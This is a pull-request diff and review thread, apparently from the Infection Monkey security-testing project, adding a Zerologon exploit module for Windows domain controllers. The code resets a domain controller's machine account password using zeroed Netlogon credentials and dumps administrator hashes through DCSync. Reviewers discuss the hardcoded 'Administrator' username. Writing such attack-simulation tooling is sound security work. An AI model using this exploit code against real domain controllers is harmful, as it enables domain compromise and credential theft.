monkey/infection_monkey/exploit/zerologon.py

```diff
@@ -0,0 +1,743 @@
+        else:
+            LOG.info("System was not exploited.")
+
+        return _exploited
+
+    def is_exploitable(self):
+        return self.zerologon_finger.get_host_fingerprint(self.host)
+
+    def connect_to_dc(self):
+        binding = epm.hept_map(self.dc_ip, nrpc.MSRPC_UUID_NRPC,
+                               protocol='ncacn_ip_tcp')
+        rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
+        rpc_con.connect()
+        rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
+        return rpc_con
+
+    def attempt_exploit(self, rpc_con):
+        request = nrpc.NetrServerPasswordSet2()
+        request['PrimaryName'] = self.dc_handle + '\x00'
+        request['AccountName'] = self.dc_name + '$\x00'
+        request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
+        authenticator = nrpc.NETLOGON_AUTHENTICATOR()
+        authenticator['Credential'] = b'\x00' * 8
+        authenticator['Timestamp'] = 0
+        request['Authenticator'] = authenticator
+        request['ComputerName'] = self.dc_name + '\x00'
+        request['ClearNewPassword'] = b'\x00' * 516
+        return rpc_con.request(request)
+
+    def restore_password(self):
+        LOG.info("Restoring original password...")
+
+        LOG.debug("DCSync; getting admin password's hashes.")
+        admin_pwd_hashes = self.get_admin_pwd_hashes()
+
+        try:
+            if not admin_pwd_hashes:
+                raise Exception("Couldn't extract admin password's hashes.")
+
+            LOG.debug("Getting original DC password's nthash.")
+            original_pwd_nthash = self.get_original_pwd_nthash(admin_pwd_hashes)
+            if not original_pwd_nthash:
+                raise Exception("Couldn't extract original DC password's nthash.")
+
+            # Keep authenticating until successful.
+            LOG.debug("Attempting password restoration.")
+            for _ in range(0, self.MAX_ATTEMPTS):
+                rpc_con = self.attempt_restoration(original_pwd_nthash)
+                if rpc_con is not None:
+                    break
+
+            if rpc_con:
+                LOG.debug("DC machine account password should be restored to its original value.")
+                return True
+            else:
+                raise Exception("Failed to restore password! Max attempts exceeded?")
+
+        except Exception as e:
+            LOG.error(e)
+
+    def get_admin_pwd_hashes(self):
+        options = self.OPTIONS_FOR_SECRETSDUMP.copy()
+        options['target'] = '$@'.join([self.dc_name, self.dc_ip])  # format for DC account - "NetBIOSName$@0.0.0.0"
+        options['target_ip'] = self.dc_ip
+        options['dc_ip'] = self.dc_ip
+
+        dumped_secrets = self.get_dumped_secrets(options=options,
+                                                 remote_name=self.dc_ip,
+                                                 username=f"{self.dc_name}$")
+        user = 'Administrator'
```

Comment:
Always the same username? Maybe export this?

Reply:
No, it's not always the same

Reply:
'Administrator' is only used twice, once in `get_admin_pwd_hashes()` and once in `save_HKLM_keys_locally()`

Reply:
I mean in terms of Windows domain controller. Is there a case when user won't be 'Administrator'? Or is there always an 'Administrator' username?

Reply:
Wait, is 'Administrator' a username or a user type? What if the user has a different username?

Reply:
Username; I'll modify it so that it uses the next available user account in case it doesn't find Administrator.